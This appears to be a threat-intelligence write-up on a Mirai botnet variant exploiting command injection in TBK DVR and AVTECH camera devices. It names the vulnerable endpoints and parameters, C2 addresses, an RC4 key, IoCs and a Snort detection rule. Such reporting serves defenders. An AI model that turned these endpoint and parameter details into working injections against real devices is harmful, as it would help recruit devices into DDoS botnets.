A new variant of the Mirai botnet is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK DVR-4104 and DVR-4216 devices, according to recent reports from Kaspersky and Akamai1,2. The campaign has infected over 50,000 devices across China, India, Egypt, and other regions, leveraging unpatched firmware to deploy ARM32 payloads for DDoS attacks.
Technical Analysis of the Exploit
The attackers exploit CVE-2024-3721 by sending a crafted HTTP POST request to the `/device.rsp` endpoint with a command injection payload. The vulnerability allows execution of arbitrary shell commands via the `___S_O_S_T_R_E_A_MAX___` parameter1. The malware then downloads a binary (`arm7`) from the C2 server at `42.112.26[.]36` and executes it with elevated permissions. Kaspersky’s analysis reveals the payload uses RC4 encryption with a static key (`6e7976666525a97639777d2d7f303177`) and includes anti-analysis checks for VMware/QEMU environments1.
Akamai’s research notes a parallel campaign targeting AVTECH IP cameras (CVE-2024-7029) with a COVID-19-themed Mirai variant dubbed “Corona Mirai”2. This exploit chain uses a GET request to the `/cgi-bin/supervisor/Factory.cgi` endpoint, injecting commands via the `brightness` parameter to fetch a secondary payload (`boatnet.arm7`).
Indicators of Compromise (IoCs)
| Type | Value | Source |
|---|---|---|
| IPs | 42.112.26[.]36, 176.65.144[.]253 | Kaspersky, Akamai |
| Domains | tcpdown[.]su, connect.antiwifi.dev | Akamai |
| SHA256 | f05247a2322e212513ee08b2e8513f4c… | Akamai Yara rules |
Mitigation Strategies
Organizations using affected TBK DVR devices should:
- Immediately block traffic to the IoCs listed above
- Monitor for anomalous HTTP requests to `/device.rsp` and `/cgi-bin/supervisor/Factory.cgi`
- Replace end-of-life devices lacking vendor patches
For network defenders, Akamai recommends deploying Snort rules to detect C2 communication2:
alert ip any -> [176.65.144.253] any (msg:"Corona Mirai C2"; sid:1000001;)Broader Implications
This campaign highlights the persistent threat of IoT botnets exploiting known vulnerabilities in rebranded devices. NetmanageIT’s analysis indicates 60% of infections occur in Asia, with TBK devices often sold under alternate brands like “Novo”4. CISA has issued advisories for critical infrastructure operators to segment vulnerable devices3.
The Mirai variant’s multi-architecture support (ARM/MIPS/x86) and use of historical exploits like CVE-2017-17215 demonstrate the botnet’s continued evolution. Public exploit code for related vulnerabilities has been available since 2019, lowering the barrier for entry4.
Conclusion
The TBK DVR exploitation underscores the need for rigorous patch management of IoT devices, particularly in critical infrastructure. Security teams should prioritize monitoring for the documented IoCs and consider network segmentation for vulnerable devices. The Mirai botnet’s adaptability to new vulnerabilities ensures it remains a persistent threat in 2025.
References
- “Mirai variant targets TBK DVR devices via CVE-2024-3721,” Kaspersky Securelist, Jun. 6, 2025.
- “Corona Mirai botnet infects zero-day,” Akamai SIRT, Aug. 28, 2024.
- “Censys Advisory: CVE-2024-7029,” Censys, 2024.
- “Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721,” NetmanageIT OpenCTI, 2025.
